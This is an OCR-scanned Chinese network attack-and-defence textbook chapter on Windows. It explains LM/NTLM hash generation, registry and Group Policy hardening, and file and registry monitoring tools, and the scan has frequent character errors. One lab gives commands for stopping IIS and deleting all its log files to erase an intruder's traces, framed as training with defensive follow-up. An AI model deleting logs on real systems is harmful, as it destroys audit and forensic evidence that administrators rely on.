0000000000000000 对 4B47532140232425 进行 标准 DES 加 密 得 到 AAD3B435B51404EE 


步骤 5: 将 加 密 后 的 这 两 组 数据 简单 拼接 ,就 得 到 了 最 后 的 LM Hash, B: 


LM Hash: C23413A8A1E7665FAAD3B435B51404EE 


3. Windows 操作 系统 下 NTLM Hash 值 的 生成 原理 

H T IBM 设计 的 LM Hash 算法 存在 应 用 上 的 缺陷 ,因此 微软 公司 在 该 算法 的 基础 上 ， 
提出 了 NTLM Hash 算法 。NTLM Hash 算法 在 兼容 LM Hash 算法 的 同时 增加 了 一 些 安 
全 机 制 ,下 面 对 Windows 操作 系统 下 NTLM Hash 值 的 生成 原理 进行 描述 。 

假设 Windows 操作 系统 登录 的 明文 口令 是 “123456”, 在 生成 NTLM Hash 时 进行 如 下 
两 步 的 运算 。 

步骤 1. 将 明文 口令 “123456” 转 换 为 Unicode 字符 串 。 





123456->310032003300340035003600 
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这 一 步 与 LM Hash 算法 不 同 , 不 需要 添加 0x00 补足 到 14B。 另 外 ,从 ASCI 字符 串 
转换 为 Unicode 编码 的 字符 串 时 ,使 用 little-endian 序 ( 即 低位 字 节 排放 在 内 存 的 低地 址 
端 ,高 位 字 节 排放 在 内 存 的 高 地 址 端 ) ,微软 公司 在 设计 整个 SMB 协议 时 就 没 考虑 过 big- 
endian 序 ( 即 高 位 字 节 排放 在 内 存 的 低地 址 端 ,低位 字 节 排放 在 内 存 的 高 地 址 端 ) ,ntoh* О, 
hton * () 函 数 不 宜 用 在 SMB 报 文 解码 中 。0x80 之 前 的 标准 ASCI 码 转换 为 Unicode їй, 
就 是 简单 地 从 0x?? 变 成 0x00?7?。 此 类 标准 ASCI 字符 串 按 little-endian 序 转换 为 
Unicode 字符 串 ,就 是 简单 地 在 每 个 原 有 字 节 之 后 添加 0x00。 

步骤 2: 对 所 获取 的 Unicode 串 进 行 标 准 МОА 单 向 Hash 运算 ,无论 数 据 源 有 多 少 字 
节 ,MD4 固定 产生 128b 的 哈 希 值 。16B 310032003300340035003600 进行 标准 MD4 单 向 
哈 希 运算 后 得 到 32ED87BDB5FDC5E9 CBA88547376818D4, 这 就 是 NTLM Hash 的 值 。 

与 LM Hash 算法 相 比 ,明文 口令 大 小 写 敏 感 , 无 法 根据 NTLM Hash 判断 原始 明文 口 
令 是 否 小 于 8B, 摆 脱 了 魔术 字符 串 "KGS! @ # $ 26", + MD4 而 言 ,如 果 采 用 穷 举 方法 
获取 明文 ,难度 较 大 。 





2.3 JIIS 日 志 分 析 : 手动 清除 HS 日 志 


系统 日 志 是 记录 系统 中 硬件 .软件 和 系统 运行 状态 的 信息 ,同时 还 可 以 记录 和 监视 系统 
中 发 生 的 事件 。 计 算 机 系统 日 志 主要 提供 系统 和 网 络 状态 的 信息 报告 。 入 侵 者 通过 删除 或 
修改 系统 日 志 销 毁 或 迷惑 被 攻击 系统 上 的 操作 记录 ,最 终 躲避 系统 管理 员 和 专业 人 员 的 追 
踪 、 审 计 和 取证 。 因 此 ,系统 日 志 对 于 保护 计算 机 系统 软 硬 件 资源 具有 不 可 替代 的 作用 , 它 
的 安全 直接 关系 到 计算 机 系统 的 安全 。 


2.3.1 预备 知识 : 日 志 的 功能 


操作 系统 的 日 志 是 一 种 非常 关键 的 服务 组 件 , 因 为 系统 日 志 通 常会 记录 一 些 操作 内 容 ， 
可 以 让 用 户 充分 了 解 系 统 的 运行 环境 ,这 些 信息 不 但 对 网 络 管理 人 员 非 常 有 用 ,而 且 对 网 络 
攻击 者 也 很 有 价值 。 例 如 , 当 攻 击 者 对 系统 进行 了 IPC 探测 时 ,系统 就 会 将 攻击 者 使 用 的 
IP 地 址 、 时 间 、 用 户 名 等 信息 记录 在 安全 日 志 中 ; 再 如 , 当 攻击 者 尝试 进行 了 FTP 探测 后 ， 
攻击 者 的 IP 地 址 \ 时 间 、 用 户 名 等 信息 将 记录 在 FTP 日 志 中 ; 等 等 。 这 些 日 志 信息 ,对 于 
系统 管理 员 来 说 是 了 解 安全 隐患 并 进行 系统 安全 加 固 的 依据 ,而 对 于 攻击 者 来 说 ,日 志 中 记 
录 着 用 于 暴露 攻击 行为 的 痕迹 。 

Windows 操作 系统 提供 了 系统 日 志 、 应 用 程序 日 志和 安全 日 志 。 其 中 ,系统 日 志 用 于 
跟踪 记录 各 种 系统 事件 ; 应 用 程序 日 志 :记录 由 应 用 程序 或 系统 产生 的 事件 ， 如 应 用 程序 产 
生 的 装载 动态 链接 库 (dllD) 失 败 的 信息 都 将 被 记录 在 该 日 志 中 ; 安全 日 志 记录 登录 ,打开 或 
关闭 网 络 改变 访问 权限 、 系 统 启动 或 关闭 事件 ,以 及 与 创建 .打开 或 删除 文件 等 资源 使 用 相 
关联 的 事件 。 

Windows 操作 系统 有 许多 应 用 程序 的 活动 需要 进行 记录 。 对 于 大 多 数 长 时 间 不 间断 
运行 的 服务 而 言 ,日 志 既 是 管理 员 了 解 系统 运行 情况 的 最 重要 途径 之 一 ,也 是 发 现 和 定位 故 
障 的 第 一 手 资料 。 
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需要 说 明 的 是 ,不 仅 Windows 操作 系统 提供 了 日 志 功 能 ,几乎 所 有 的 主流 操作 系统 、 数 
据 库 、 应 用 系统 都 提供 了 日 志 服 务 。 


2.3.2 实现 目的 和 条 件 


1. 实验 目的 

在 学 习 并 掌握 Windows 系统 中 IISCInternet Information Services ,互联 网 信息 服务 ) 安 
装 与 配置 方法 的 基础 上 ,使 读者 通过 本 实验 学 习 IIS 日 志文 件 的 组 成 及 应 用 功能 ,掌握 IIS 
日 志 的 清除 方法 。 

2. 实验 清单 及 软 硬 件 要 求 

本 实验 采用 Windows Server 2003 服务 器 操作 系统 。 如 果 读 者 使 用 的 是 Windows XP 
等 桌面 操作 系统 ,实验 原理 与 此 类 似 , 但 操作 方法 有 所 差异 ,在 具体 实验 过 程 中 ,读者 可 参阅 
相关 操作 系统 的 使 用 指南 。 


2.3.3 实验 过 程 


步骤 1: 以 系统 管理 员 身 份 正 常 登录 Windows Server 2003 服务 器 操作 系统 ,进入 实验 
环境 。 

JEJE 2: 查看 C:\ WINDOWS\system32\LogFiles\W3SVC854941 中 的 日 志文 件 ,如 
图 2-14 所 示 。 


ГТ \FINDOYS\ sys ten32\LocFiles\FISVCBSASAI 








2-14 查看 Windows Server 2003 日 志文 件 


步骤 3: 在 DOS 命令 提示 符 下 输入 “cd C:\ WINDOWS \ system32\ LogFiles \ 
W3SVC854941"dp ^ ,切换 到 W3SVC854941 目录 下 。 

步骤 4: 输入 “net stop w3svc” 命 令 ,停止 w3svc 服务 。 

步骤 5: f Adel ”命令 ,删除 所 有 日 志文 件 。 

步骤 6: 输入 “net start w3svc” 命 令 ,启动 w3svc 服务 。 

以 上 操作 过 程 如 图 2-15 所 示 。 

通过 以 上 操作 , 当 再 次 打开 W3SVC854941 目录 时 ,在 类 似 图 2-14 所 示 的 窗口 中 ,将 会 
发 现 日 志文 件 已 经 被 删除 。 
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В 2-15 对 IIS 服务 的 操作 过 程 


2.3.4 任务 与 思考 


通过 本 实验 ,读者 可 以 考虑 这 样 一 个 问题 : 出 于 安全 考虑 ,在 提供 重要 服务 的 系统 中 如 
何 将 日 志 单 独 保存 和 加 强 管理 

针对 此 问题 ,具体 可 通过 修改 日 志文 件 的 存放 文件 夹 ( 必 须 在 NTFS 分 区 中 ) 的 访问 权 
限 来 实现 。 一 般 情况 下 ,对 于 Everyone 账户 可 只 分 配 “ 读 取 ” 权 限 , 对 System 账户 取消 “ 完 
全 控制 "和 “修改 ”权限 的 分 配 。 这 样 , 当 攻击 者 试图 清除 Windows 日 志 时 ,就 会 被 拒绝 。 

由 于 攻击 者 容易 在 日 志文 件 中 留 下 操作 的 痕迹 ,因此 管理 员 可 以 通过 设置 入 侵 检 测 系 
统 (Intrusion Detection Systems,IDS) 规 则 ,建立 系统 受到 入 侵 时 的 特征 库 , 通 过 将 系统 运 
行情 况 与 该 特征 库 进 行 比较 ,判定 是 否 有 入 侵 行为 发 生 。 和 人 侵 检测 作为 一 种 "主动 防御 ”的 
检测 技术 ,具有 较 强 的 实时 防护 功能 ,可 以 迅速 提供 对 系统 、 网 络 的 攻击 和 对 用 户 误 操作 的 
实时 防护 ,在 预测 到 入 侵 企 图 时 进行 拦截 ,或 者 提醒 管理 员 做 好 预防 。 




















2.4 针对 注册 表 的 攻防 


注册 表 和 组 策略 是 Windows 操作 系统 提供 的 两 项 管理 功能 ,两 者 的 操作 方法 不 同 , 但 
实现 功能 大 部 分 相同 。 


2.4.1 预备 知识 : 了 解 注册 表 


从 用 户 的 角度 看 ,注册 表 系 统 由 注册 表 数 据 库 和 注册 表 编 辑 器 两 部 分 组 成 。 其 中 ,注册 
表 数 据 库 包括 SYSTEM. DAT 和 USER. DAT 两 个 文件 。SYSTEM. DAT 用 来 保存 计算 
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机 的 系统 信息 ,如 安装 的 硬件 和 设备 驱动 程序 的 有 关 信息 等 ; USER. DAT 用 来 保存 每 个 用 
户 特 有 的 信息 ,如 桌面 设置 .墙纸 或 窗口 的 颜色 设置 等 。 注 册 表 编辑 器 (regedit. exe) 是 一 个 
专门 编辑 注册 表 的 程序 ,用 来 进行 注册 表 基 本 的 浏览 编辑 和 修改 。 注 册 表 的 架构 采用 的 是 
树 状 结构 。 

由 于 注册 表 的 重要 性 ,系统 管理 员 可 以 通过 加 固 注册 表 提 高 系统 的 安全 性 ,防止 攻击 者 
通过 修改 注册 表 破 坏 系 统 。 攻 击 者 在 人 侵 目标 系统 后 通过 权限 提升 拥有 对 注册 表 的 修改 权 
限 ,再 通过 修改 注册 表 实 现 对 系统 的 攻击 或 为 下 一 次 攻击 做 好 准备 。 

1. 禁用 注册 表 编 辑 器 

在 Windows 系统 安装 结束 后 ,用 户 可 以 使 用 注册 表 编 辑 工具 regedit. exe 对 注册 表 进 
行 修改 ,存在 较 大 的 安全 隐患 。 对 于 提供 信息 服务 的 重要 系统 ,可 以 通过 禁止 用 户 使 用 注册 
表 编 辑 工 具 提 高 系统 的 安全 性 。 

2. 限制 对 注册 表 的 远程 访问 

由 于 注册 表 是 Windows 操作 系统 的 核心 ,而且 默认 情况 下 所 有 安装 Windows 操作 系 
统 的 计算 机 注册 表 在 网 络 上 都 是 可 以 被 访问 的 ,因此 攻击 者 完全 可 以 利用 这 个 漏洞 对 目标 
主机 进行 注册 表 攻 击 ,如 修改 文件 关系 和 插入 恶意 代码 。 为 了 保护 操作 系统 ,可 以 禁止 对 注 
册 表 的 远程 访问 ,其 具体 方法 是 在 本 地 “服务 ”列表 中 找到 Remote Registry 服务 ,将 其 “ 启 
动 类 型 "设置 为 “禁用 ” 即 可 。 

3. 禁用 注册 表 的 启动 项 

一 些 恶 意 代码 或 攻击 程序 通过 注册 表 的 启动 项 (Run 值 ) 加 载运 行 。 出 于 安全 考虑 ,可 
以 在 注册 表 编 辑 器 中 依次 展开 HKEY _ LOCAL _ MACHINE \ Software \ Microsoft V 
Windows\ Current VersionNRun ,将 子 键 Run 的 权限 设置 为 “ 读 取 ”, 取 消 对 “完全 控制 "权限 
的 选择 。 


2.4.2 实验 目的 和 条 件 








1. 实验 目的 

通过 本 实验 ,使 读者 掌握 以 下 的 内 容 。 

(1) Filemon 软件 的 原理 和 使 用 方法 。 

(2) FileChangeNotify 软件 的 原理 和 使 用 方法 。 

(3) Regmon 软件 的 原理 和 使 用 方法 。 

2. 实验 清单 及 软 硬 件 要 求 

读者 可 以 在 Windows Server 2003 操作 系统 上 完成 本 实验 。 在 进行 本 实验 之 前 ,需要 
准备 和 部 署 以 下 软件 。 

(1) Filemon, Filemon 是 一 款 文件 系统 监视 软件 ,用 于 监视 应 用 程序 进行 的 文件 读 写 
操作 。 它 将 所 有 与 文件 相关 的 操作 (如 读 取 、 修 改 . 出 错 信息 等 ) 全 部 记录 下 来 ,并 允许 用 户 
对 记录 的 信息 进行 保存 ,过 滤 、 查 找 等 。 

(2) FileChangeNotify。FileChangeNotify 是 一 款 文件 修改 监视 软件 。 

(3) Regmon, Regmon(Registry Monitor) 是 一 款 注册 表 数 据 库 监视 软件 。 
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在 本 实验 中 ,以 上 3 款 工具 软件 全 部 保存 在 D:\tools 文件 夹 中 。 
2.4.3 实验 过 程 


步骤 1: 以 系统 管理 员 身份 正常 登录 Windows Server 2003 操作 系统 。 

步骤 2: ЖЛ D & tools 下 的 filemon 文件 夹 ,在 filemon. exe 文件 上 双击 执行 。 

步骤 3: 运行 filemon. exe 文件 后 ,该 文件 即 可 将 所 有 与 文件 相关 的 操作 全 部 记录 下 
来 ,选项 栏 依次 显示 为 序号 时间、 进程 .请 求 .路 径 、 结 果 、 其 他 等 ,如 图 2-16 所 示 。 


Qi eeeeeeeeeeeeeeeeeee 





图 2-16 Filemon 工具 操作 界面 


步骤 A. 如 果 需 要 查看 相关 的 进程 ,可 以 在 选取 了 指定 进程 后 右 击 , 在 出 现 的 快捷 菜单 
中 选择 “进程 属性 ”选项 ,显示 如 图 2-17 所 示 的 信息 。 





图 2-17 查看 指定 进程 的 属性 


步骤 5: 双击 某 个 进程 ,可 以 打开 该 进程 所 在 的 文件 夹 , 如 图 2-18 所 示 。 

步骤 6: 复制 该 文件 夹 到 桌面 ,并 重 命 名 (为 便于 实验 时 查看 )。 

步骤 7: 打开 DD 盘 的 tools 文件 夹 ,找到 fileChangeNotify. exe 文件 ,在 其 上 双击 运行 ， 
并 选取 “开始 监视 " 即 可 对 文件 进行 监视 。 这 时 ,读者 可 以 在 桌面 上 建立 一 个 新 的 文件 夹 , 随 
后 将 该 文件 夹 修 改 为 test, 然后 再 将 其 删除 。 这 样 , 所 有 操作 将 自动 显示 在 
FileChangeNotify 监视 窗口 中 ,如 图 2-19 所 示 。 
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图 2-19 FileChangeNotify 监视 窗口 中 显示 已 进行 的 文件 夹 操作 


步骤 8: 打开 D fit tools\Regmon 文件 夹 , 在 regmon. exe 文件 上 双击 运行 ,在 打开 的 如 
图 2-20 所 示 的 对 话 框 中 主要 查看 注册 表 信 息 。 
步骤 9: 双击 任意 进程 ,可 以 看 到 该 进程 所 在 注册 表 的 具体 位 置 , 如 图 2-21 所 示 。 
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图 2-21 显示 进程 所 在 注册 表 的 位 置 


2.4.4 任务 与 思考 


通过 本 实验 ,读者 需要 进一步 思考 和 学 习 常用 注册 表 的 键 值 类 型 。 常 用 的 注册 表 键 值 
类 型 主要 有 以 下 几 类 。 
(D REG BINARY. REG BINARY 为 未 处 理 的 二 进 制 数据 。 多 数 硬件 组 件 信 息 都 


第 2 章 Windows 操作 系统 攻防 实 训 49 





是 以 二 进 制 存储 的 ,但 以 十 六 进 制 格式 显示 在 注册 表 编 辑 器 中 。 

(2) REG_WORD。 数 据 由 4 字 节 长 的 数 表示 。 许 多 设备 驱动 程序 和 服务 的 参数 使 用 
这 种 类 型 ,并 在 注册 表 编 辑 器 中 以 二 进 制 ,十 六 进 制 或 十 进 制 的 格式 显示 。 

(3) REG EXPAND SZ, REG EXPAND SZ 为 长 度 可 变 的 数据 串 。 该 数据 类 型 包含 
在 程序 或 服务 使 用 该 数据 时 确定 的 变量 。 

(4) REG MULTI SZ, КЕС MULTI SZ 为 多 重 字符 串 。 其 中 包含 格式 可 被 用 户 读 
取 的 列表 项 ,用 空格 .逗号 或 其 他 标记 分 开 。 

(5) REG. SZ, REG SZ 为 固定 长 度 的 文本 串 。 


2.5 针对 组 策略 的 攻防 


组 策略 (Group Policy) 是 配置 Windows 的 一 种 有 效 工 具 。 虽 然 组 策略 编辑 器 中 的 大 部 
分 配置 都 可 以 通过 直接 修改 注册 表 实 现 ,但 是 通过 组 策略 编辑 器 比 通过 注册 表 进 行 修改 更 
加 直观 , 且 不 容易 出 错 。 


2.5.1 预备 知识 : 了 解 组 策略 


作为 Windows 操作 系统 中 一 个 能 够 让 系统 管理 员 充分 管理 用 户 工作 环境 的 工具 ,通过 
组 策略 可 以 为 用 户 设 置 不 同 的 工作 环境 。 组 策略 包含 “计算 机 配置 "和 “用 户 配 置 ”两 部 分 ， 
分 别 对 计算 机 和 用 户 的 相关 配置 环境 产生 影响 ,运行 “gpedit. msc” 命 令 可 以 打开 组 策略 编 
辑 器 。 组 策略 有 以 下 两 种 配置 方式 。 

(1) 本 地 计算 机 策略 。 本 地 计算 机 策略 可 以 用 来 设置 单一 计算 机 的 策略 ,在 这 个 策略 
内 的 计算 机 配置 只 会 被 应 用 到 这 台 计 算 机 ,而 用 户 设 置 会 被 应 用 到 在 此 计算 机 登录 的 所 有 
用 户 。 

(2) 域 的 组 策略 。 域 的 组 策略 在 域内 可 以 针对 站 点 、 域 或 组 织 单位 来 设置 组 策略 。 其 
中 , 域 组 策略 内 的 设置 会 被 应 用 到 域内 的 所 有 计算 机 与 用 户 ,而 组 织 单位 的 组 策略 会 被 应 用 
于 该 组 织 单位 内 的 所 有 计算 机 与 用 户 。 


2.5.2 实验 目的 和 条 件 


1. 实验 目的 

在 系统 掌握 Windows 操作 系统 组 策略 功能 和 管理 方式 的 基础 上 ,结合 前 面 有 关注 册 表 
的 实验 内 容 , 进一步 学 习 组 策略 的 安全 设置 方法 。 根据 网 络 攻防 实际 ,本 实验 针对 
Windows Server 服务 器 操作 系统 中 的 组 策略 进行 学 习 。 在 掌握 了 有 关 服 务 器 版 本 操作 系 
统 的 组 策略 配置 与 管理 方法 后 ,读者 可 参考 相关 操作 指南 学 习 针 对 Windows XP 等 桌面 操 
作 系 统 组 策略 的 管理 方法 。 

2. 实验 清单 及 软 硬 件 要 求 

根据 目前 应 用 实际 ,本 实验 中 选择 Windows Server 2008 R2 标准 版 的 服务 器 操作 系统 
作为 实验 平台 。 
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2.5.3 实验 过 程 


1. 取消 关机 前 的 提示 信息 

当 对 Windows Server 2008 R2( 包 括 其 他 版 本 的 Windows Server 操作 系统 ) 计 算 机 进 
行 关机 操作 时 ,系统 会 要 求 提供 关机 的 理由 (因为 服务 器 一 般 是 不 会 关机 的 ), 如 图 2-22 所 
示 。 此 提示 带 来 日 常 操作 中 的 不 便 ,对 于 经 常 需要 远程 管理 的 Windows Server 服务 器 来 
说 ,可 以 通过 组 策略 的 配置 , 当 需 要 进行 关机 时 不 再 出 现 图 2-22 中 的 提示 信息 ,而 是 直接 
关机 。 


过 
其 他 计划 内 ) 


一 





图 2-22 选择 关机 时 理由 


步骤 1: 选择 “开始 ”>“ 运 行 " 选 项 ,在 打开 的 “运行 "操作 框 中 输入 “gpedit. msc” 命 令 ， 
如 图 2-23 所 示 。 


[ == | w | mo- | 





图 2-23 输入 “gpedit. тес” 


步骤 2. 单 击 “ 确 定 ” 按 钮 后 ,在 打开 的 “本 地 组 策略 编辑 器 "窗口 中 依次 选择 “计算 机 配 
置 ”>“ 管 理 模板 ”>“ 系 统 ” 选 项 ,在 右 侧 列表 框 中 选取 “在 登录 时 不 显示 “管理 您 的 服务 器 ? 
页 ”选项 ,如 图 2-24 所 示 。 

步骤 3: 在 打开 的 如 图 2-25 所 示 的 对 话 框 中 ,选中 “已 禁用 ” 单 选 按 钮 ,并 单 击 “ 确 定 ” 
按钮 。 

通过 以 上 设置 ,以 后 要 关机 或 重新 启动 计算 机 时 ,系统 都 不 会 再 出 现 类 似 图 2-22 所 示 
的 对 话 框 。 
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图 2-24 选取 “在 登录 时 不 显示 “管理 您 的 服务 器 页 ”选项 
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Windows Server 2003 开始 的 Windows Server 计算 机 时 ,会 
显示 关闭 事件 跟踪 程序 


如 果 启 用 此 设置 并 从 下 拉 薄 单 中 选择 “ 仅 工作 站 ” ， 则 当 关 闭 以 











2-25 ”选中 “已 禁用 " 单 选 按钮 


52 网 络 攻击 与 防御 实 训 





2. 阻止 用 户 从 “开始 ”菜单 执行 “关机 ”重新 启动 ”等 命令 
于 服务 器 应 用 的 重要 性 ,不 管 是 本 地 操作 还 是 远程 控制 ,一 般 很 少 要 求 系 统 进行 关 
机 、 重 新 启动 .睡眠 、 休 眠 等 操作 。 尤 其 在 攻击 者 入 侵 系 统 后 ,更 不 允许 使 用 这 些 功能 。 通 过 
本 实验 ,将 会 取消 Windows Server 2008 操作 系统 “开始 ”菜单 或 “Windows 安全 ”执行 中 的 
关机 、 重 新 启动 睡眠 、 休 眼 等 功能 项 。 

步骤 1: 依次 选择 “本 地 计算 机 策略 ”>“ 用 户 配置 ">“ 管 理 模板 ”>“* 开 始 菜 单 和 任务 
栏 ” 选 项 ,在 右 侧 列表 中 选取 “删除 并 阻止 访问 “关机 ”重新 启动 '' 睡 眼 ? 和 “ 休 眼 ”命令 ,如 
图 2-26 所 示 。 
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E 2-26 选择 “删除 并 阻止 访问 “关机 “重新 启动 “睡眠 ?和 “休眠 ”命令 


步骤 2. 在 打开 的 如 图 2-27 所 示 对 话 框 中 ,选中 “已 启用 ” 单 选 按钮 ,此 设置 会 立即 应 用 
到 所 有 用 户 。 

之 后 就 会 发 现 ,“ 关 机 ”重新 启动 “睡眠 ”和 “休眠 "命令 将 从 “开始 ”菜单 中 被 删除 ,电源 
按钮 也 会 从 “Windows 安全 ”中 删除 ,提高 了 系统 应 用 的 安全 性 。 

з. 禁用 浏览 器 上 的 “连接 ”和 “安全 ”选项 卡 

通过 浏览 器 属性 中 的 “连接 ”和 “安全 ”选项 卡 ,如 图 2-28 所 示 , 可 以 对 用 户 浏览 器 的 安 
全 性 进行 设置 ,如 禁止 访问 某 些 网 站 .启用 安全 保护 .设置 连接 代理 等 。 出 于 安全 ,可 以 禁止 
用 户 使 用 此 功能 。 

步 又 1: 依次 选择 “本 地 计算 机 策略 >“ 用户 配置 ">“ 管 理 模板 ”>“Windows 组 件 ” 一 
Internet Explorer>“Internet 控制 面板 ”选项 ,在 右 侧 的 列表 框 中 可 分 别 选取 “禁用 连接 页 ” 
和 “禁用 安全 页 ”选项 ,如 图 2-29 所 示 。 

步骤 2: 在 出 现 的 类 似 如 图 2-30 所 示 的 对 话 框 中 ,选中 “已 启用 ” 单 选 按钮 ,此 设置 会 

应 用 到 所 有 用 户 。 
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图 2-28 浏览 器 正常 时 显示 的 选项 卡 
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图 2-30 ”选取 “已 启用 ” 单 选 按钮 
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步骤 3: 选择 Internet Explorer 中 的 “Internet 选项 ”选项 ,打开 如 图 2-31 所 示 的 对 话 
框 ,将 其 与 图 2-28 进行 比较 。 读 者 会 发 现 :“Internet 选项 ”对 话 框 中 已 经 不 再 显示 “安全 ” 
和 “连接 ”选项 卡 。 





图 2-31 不 再 显示 “安全 ”和 “连接 ”选项 卡 


4. 隐藏 “Windows 防火 墙 ” 


防火 墙 是 网 络 安全 中 应 用 最 广泛 的 一 类 工具 , Windows 防火 墙 属于 个 人 防火 墙 ,是 
Windows 操作 系统 自身 集成 的 防火 墙 。 启 用 了 防火 墙 后 ,会 给 用 户 的 部 分 操作 带 来 不 便 ， 
所 以 用 户 经 常会 关闭 防火 墙 。 为 了 防止 用 户 因 关闭 Windows 防火 墙 ” 而 带 来 安全 问题 ,可 
以 将 “Windows 防火 墙 ?隐藏 起 来 。 

步骤 1: 依次 选择 “本 地 计算 机 策略 >“ 用户 配置 ">“ 管 理 模板 ”> “控制 面板 ”选项 ,在 
右 侧 列表 框 中 选择 “隐藏 指定 的 “控制 面板 "项 ”选项 ,如 图 2-32 所 示 。 

步骤 2: 在 打开 的 对 话 框 中 首先 选中 “已 启动 ” 单 选 按 钮 ,然后 再 单 击 “ 显 示 ”>“ 添 加 ” 按 
钮 ,在 “显示 内 容 ” 对 话 框 中 输入 *Windows Bi Ki” GES Windows 与 防火 墙 之 间 有 一 个 空 
格 ) ,如 图 2-33 所 示 。 依 次 单 击 “ 确 定 ” 按 钮 ,此 设置 会 立即 应 用 到 所 有 用 户 。 

之 后 ,用 户 再 选择 “开始 ”一 “控制 面板 ”>“ 系 统 和 安全 ”选项 ,在 打开 的 如 图 2-34 所 示 
的 对 话 框 中 ,可 以 看 到 “Windows 防火 墙 " 已 经 被 隐藏 。 


2.5.4 任务 与 思考 


组 策略 涉及 的 内 容 非 常 广泛 ,本 实验 仅 选择 了 几 个 典型 的 应 用 ,目的 是 让 读者 掌握 组 策 
略 的 应 用 功能 和 配置 方法 。 在 此 基础 上 ,读者 可 以 结合 攻防 实际 ,针对 不 同 的 组 策略 管理 要 
求 ,通过 自己 设计 不 同 的 应 用 环境 进行 实验 测试 ,提高 针对 Windows 组 策略 的 攻防 能 力 。 

在 单机 运行 环境 下 ,通过 组 策略 可 以 进行 很 多 配置 ,如 限制 可 执行 文件 的 运行 限制 
.appx 程序 的 执行 .设置 密码 策略 等 ,如 图 2-35 所 示 。 
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TETA “281806” КИШЕТ ИТИНИ 
禁止 访问 “控制 面板 ” 

i 只 显示 指定 的 “控制 面板 ”项 


CPL 文件 或 CPL 文件 包含 多 个 小 程序 ， 则 应 输入 其 模块 名 称 和 : 
符 种 资源 标识 号 (ft , RA "Osystemcpl.di-1" WE “St 
,输入 “四 themecpl.dl-1” 指定 “个 性 化 ). 


在 MSDN 的 http://go.microsoft.com/fwlink/?Linkid=122973 
中 可 以 找到 控制 面板 项 的 规范 名 称 和 模块 名 称 的 完整 列表 . 


图 2-33 添加 “Windows 防火 墙 


$23 Windows 操作 系统 攻防 实 训 57 











C )- fe EE- AEE 


控制 面板 主页 










Ve Hi usan Өк»: Ж 


лека BCECT THAM хатат 
FERN Internet иш SÉ ramai 设备 管理 器 
硬件 Yinders Update 
иж Ф) i | вжи  wücsanes 
ReRe Е . 
Ks YỌ mse влажан mores 
m д. вета 
анда ÇH sasscesmm | Semanan бзавнах бн» 
轻 检 访 问 СЕГЕ 5] 





图 2-34 "Windows 防火 墙 " 已 经 被 隐藏 
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图 2-35 设置 “密码 策略 ” 


而 在 Windows Server 活动 目录 域 环境 中 ,组 策略 的 功能 更 加 强大 ,主要 包括 以 下 几 
方面 。 

(1) 通过 组 策略 管理 用 户 工作 环境 。 系 统管 理 员 通过 对 组 策略 的 配置 ,可 以 根据 管理 
需要 设置 用 户 的 操作 环境 ,加 强 对 用 户 操作 的 控制 ,以 提高 系统 的 安全 性 。 例 如 ,通过 组 策 
略 的 配置 ,可 以 限制 用 户 只 能 在 限定 的 时 间 范 围 内 浏览 Internet、 限 制 用 户 修改 客户 端的 配 
置 等 。 

(2) 利用 组 策略 部 署 软件 。 系 统管 理 员 可 以 通过 组 策略 将 软件 部 署 给 域 用 户 或 计算 
机 ,这 样 , 当 域 用 户 登录 或 成 员 计算 机 启动 时 将 自动 安装 被 部 署 的 软件 。 为 了 适应 不 同 的 用 
户 需要 ,组 策略 的 软件 部 署 功 能 还 提供 了 分 配 (assign) 与 发 布 (publish) 两 种 方式 。 

(D 分 配 。 当 管理 员 将 一 个 软件 通过 组 策略 分 配给 域 成 员 计 算 机 后 ,这些 计 算 机 启动 时 
就 会 自动 安装 这 个 软件 ,而且 任 何 用 户 登 录 都 可 以 使 用 此 软件 。 用 户 登 录 后 ,就 可 以 通过 桌 
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面 或 “开始 ”菜单 启用 此 软件 。 

@ 发 布 。 当 管理 员 将 一 个 软件 通过 组 策略 发 布 给 域 用 户 后 , 它 并 不 会 自动 被 安装 到 用 
户 的 计算 机 中 ,用 户 可 以 通过 “控制 面板 ”安装 此 软件 。 

(3) 限制 软件 的 运行 。Windows Server 域 环境 提供 了 功能 非常 丰富 和 强大 的 软件 管 
理 功能 ,通过 软件 限制 策略 所 提供 的 多 种 规则 ,可 以 限制 或 允许 用 户 运行 的 程序 。 

读者 可 以 在 本 实验 操作 的 基础 上 ,结合 具体 应 用 ,通过 配置 组 策略 提升 应 用 的 安全 性 。 


2.6 Windows Server 的 安全 配置 


2.6.1 预备 知识 : Windows Server 的 网 络 功能 


从 Windows NT Server 4. 0 开始 ,Windows 服务 器 操作 系统 开始 在 国内 得 到 大 量 应 
用 。 虽 然 微软 公司 宣布 基于 Windows Server 2016 开发 的 Windows Server 2019 将 于 2018 
年 下 半年 正式 发 布 , 但 在 众多 Windows Server 版 本 中 , Windows Server 2003 最 受用 户 青 
睐 ,主要 有 以 下 两 个 原因 。 

1. Windows Server 支持 的 网 络 环境 

Windows Server 支持 不 同 的 网 络 技术 和 服务 ,可 以 让 技术 人 员 根 据 需 要 组 建 各 种 不 同 
规模 和 应 用 功能 的 网 络 。 由 Windows Server 组 建 的 网 络 , 主 要 分 为 以 下 3 种 类 型 。 

(1) 企业 内 部 网 络 。 企 业内 部 网 络 (Intranet) 一 般 是 指 单 位 内 部 的 本 地 局 域 网 (Local 
Area Network,LAN)。 通 过 单位 内 部 的 LAN, 用 户 可 以 将 文件 ,打印 机 等 资源 共享 给 其 他 
网 络 用 户 访问 。 由 于 Internet 的 蓬勃 发 展 ,一 般 单位 内 部 网 络 会 组 建成 各 种 与 Internet 4H 
关 的 应 用 和 服务 ,如 内 部 Web 网 站 、 内 部 电子 邮件 系统 等 。 

(2) 因特网 。 因 特 网 (Internet) 是 连接 全 球 的 最 大 范围 的 互联 网 ,通过 Internet 可 以 让 
单位 内 部 网 络 与 世界 范围 内 提供 Internet 服务 的 网 络 互联 。 用 户 可 以 通过 Web 浏览 器 访 
问 资源 ,通过 电子 邮件 传递 信息 等 。 

(3) 企业 外 部 网 络 。 企 业 外 部 网 络 (Extranet) 是 指 根据 单位 的 需要 ,通过 Internet 将 与 
本 单位 有 着 密切 合作 关系 的 其 他 单位 的 网 络 ( 一 般 为 LAN) 连 接 起 来 ,从 而 形成 一 个 在 联系 
上 相对 紧密 的 网 络 ,以 便 相 互 间 共享 资源 。 

2. Windows Server 提供 的 网 络 技术 和 服务 

Windows Server 主要 提供 了 以 下 的 网 络 技术 和 服务 。 

CD 同时 支持 IPv4 和 IPv6。 

(2) 支持 DHCP,DNS, WINS 等 服务 ,可 分 别 组 建 DHCP、DNS 和 WINS 服务 器 。 

(3) 提供 PKICPublic Key Infrastructure, 公共 密 钥 基础 设施 ) 与 IPSec (Internet 
